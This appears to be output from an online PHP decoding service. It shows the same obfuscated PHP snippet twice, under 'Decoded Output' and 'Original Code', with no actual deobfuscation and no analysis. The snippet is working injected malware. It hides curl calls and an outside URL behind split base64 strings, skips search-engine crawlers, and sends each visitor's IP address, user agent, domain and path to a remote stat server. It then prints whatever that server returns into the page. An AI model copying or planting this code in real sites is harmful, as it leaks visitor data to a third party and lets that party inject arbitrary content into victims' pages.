Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' ...
Decoded Output download
<?php
$GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('c' .'3Ry' .'c3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c3Ry' .'c3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3R' .'yc3Ry'),base64_decode('YmFzZ' .'TY0X2' .'RlY29kZQ=='),base64_decode('dXJ' .'sZW5' .'jb2R' .'l'),base64_decode('' .'dXJs' .'ZW' .'5j' .'b2' .'Rl'),base64_decode('dXJ' .'sZW5j' .'b2Rl'),base64_decode('dXJsZW' .'5j' .'b2Rl'),base64_decode('Y' .'3Vyb' .'F9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRv' .'cHQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcH' .'Q='),base64_decode('Y3VybF9' .'le' .'G' .'Vj'),base64_decode('Y' .'3VybF9jbG9z' .'ZQ' .'=='));
function aaf($i){$a=Array('HTTP_USER_AGENT',"",'google','yahoo','baidu','msn','opera','chrome','bing','safari','bot','HTTP_REFERER',"",'REMOTE_ADDR','HTTP_HOST','aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw','?ip=','REMOTE_ADDR','&useragent=','&domainname=','HTTP_HOST','&fullpath=','REQUEST_URI','&check=','look',"O"," ");return $a[$i];};
if(!isset($aafv_0)){global $aafv_0;$aafv_0=round(0+1);$aafv_1=$GLOBALS['_aaf_'][0]($_SERVER[aaf(0)]);$aafv_2=NULL;$aafv_3=aaf(1);if(($GLOBALS['_aaf_'][1]($aafv_1,aaf(2))== false)&&($GLOBALS['_aaf_'][2]($aafv_1,aaf(3))== false)&&($GLOBALS['_aaf_'][3]($aafv_1,aaf(4))== false)&&($GLOBALS['_aaf_'][4]($aafv_1,aaf(5))== false)&&($GLOBALS['_aaf_'][5]($aafv_1,aaf(6))== false)&&($GLOBALS['_aaf_'][6]($aafv_1,aaf(7))== false)&&($GLOBALS['_aaf_'][7]($aafv_1,aaf(8))== false)&&($GLOBALS['_aaf_'][8]($aafv_1,aaf(9))== false)&&($GLOBALS['_aaf_'][9]($aafv_1,aaf(10))== false)&&$_SERVER[aaf(11)]!=aaf(12)){if(isset($_SERVER[aaf(13)])== true && isset($_SERVER[aaf(14)])== true){$aafv_3=$GLOBALS['_aaf_'][10](aaf(15)) .aaf(16) .$GLOBALS['_aaf_'][11]($_SERVER[aaf(17)]) .aaf(18) .$GLOBALS['_aaf_'][12]($aafv_1) .aaf(19) .$GLOBALS['_aaf_'][13]($_SERVER[aaf(20)]) .aaf(21) .$GLOBALS['_aaf_'][14]($_SERVER[aaf(22)]) .aaf(23) .isset($_GET[aaf(24)]);$aafv_2=$GLOBALS['_aaf_'][15]($aafv_3);}}if($aafv_2 !== NULL){$GLOBALS['_aaf_'][16]($aafv_2,CURLOPT_RETURNTRANSFER,round(0+1));$GLOBALS['_aaf_'][17]($aafv_2,CURLOPT_TIMEOUT,round(0+6));$aafv_4=@$GLOBALS['_aaf_'][18]($aafv_2);if($aafv_4[round(0)]==aaf(25)){$aafv_4[round(0)]=aaf(26);echo $aafv_4;}$GLOBALS['_aaf_'][19]($aafv_2);}};
?>
Did this file decode correctly?
Original Code
<?php
$GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('c' .'3Ry' .'c3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c3Ry' .'c3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3R' .'yc3Ry'),base64_decode('YmFzZ' .'TY0X2' .'RlY29kZQ=='),base64_decode('dXJ' .'sZW5' .'jb2R' .'l'),base64_decode('' .'dXJs' .'ZW' .'5j' .'b2' .'Rl'),base64_decode('dXJ' .'sZW5j' .'b2Rl'),base64_decode('dXJsZW' .'5j' .'b2Rl'),base64_decode('Y' .'3Vyb' .'F9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRv' .'cHQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcH' .'Q='),base64_decode('Y3VybF9' .'le' .'G' .'Vj'),base64_decode('Y' .'3VybF9jbG9z' .'ZQ' .'=='));
function aaf($i){$a=Array('HTTP_USER_AGENT',"",'google','yahoo','baidu','msn','opera','chrome','bing','safari','bot','HTTP_REFERER',"",'REMOTE_ADDR','HTTP_HOST','aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw','?ip=','REMOTE_ADDR','&useragent=','&domainname=','HTTP_HOST','&fullpath=','REQUEST_URI','&check=','look',"O"," ");return $a[$i];};
if(!isset($aafv_0)){global $aafv_0;$aafv_0=round(0+1);$aafv_1=$GLOBALS['_aaf_'][0]($_SERVER[aaf(0)]);$aafv_2=NULL;$aafv_3=aaf(1);if(($GLOBALS['_aaf_'][1]($aafv_1,aaf(2))== false)&&($GLOBALS['_aaf_'][2]($aafv_1,aaf(3))== false)&&($GLOBALS['_aaf_'][3]($aafv_1,aaf(4))== false)&&($GLOBALS['_aaf_'][4]($aafv_1,aaf(5))== false)&&($GLOBALS['_aaf_'][5]($aafv_1,aaf(6))== false)&&($GLOBALS['_aaf_'][6]($aafv_1,aaf(7))== false)&&($GLOBALS['_aaf_'][7]($aafv_1,aaf(8))== false)&&($GLOBALS['_aaf_'][8]($aafv_1,aaf(9))== false)&&($GLOBALS['_aaf_'][9]($aafv_1,aaf(10))== false)&&$_SERVER[aaf(11)]!=aaf(12)){if(isset($_SERVER[aaf(13)])== true && isset($_SERVER[aaf(14)])== true){$aafv_3=$GLOBALS['_aaf_'][10](aaf(15)) .aaf(16) .$GLOBALS['_aaf_'][11]($_SERVER[aaf(17)]) .aaf(18) .$GLOBALS['_aaf_'][12]($aafv_1) .aaf(19) .$GLOBALS['_aaf_'][13]($_SERVER[aaf(20)]) .aaf(21) .$GLOBALS['_aaf_'][14]($_SERVER[aaf(22)]) .aaf(23) .isset($_GET[aaf(24)]);$aafv_2=$GLOBALS['_aaf_'][15]($aafv_3);}}if($aafv_2 !== NULL){$GLOBALS['_aaf_'][16]($aafv_2,CURLOPT_RETURNTRANSFER,round(0+1));$GLOBALS['_aaf_'][17]($aafv_2,CURLOPT_TIMEOUT,round(0+6));$aafv_4=@$GLOBALS['_aaf_'][18]($aafv_2);if($aafv_4[round(0)]==aaf(25)){$aafv_4[round(0)]=aaf(26);echo $aafv_4;}$GLOBALS['_aaf_'][19]($aafv_2);}};
?>
Function Calls
aaf | 1 |
round | 1 |
base64_decode | 40 |
Stats
MD5 | 64c75006b97f08ebb7670a216bde0674 |
Eval Count | 0 |
Decode Time | 313 ms |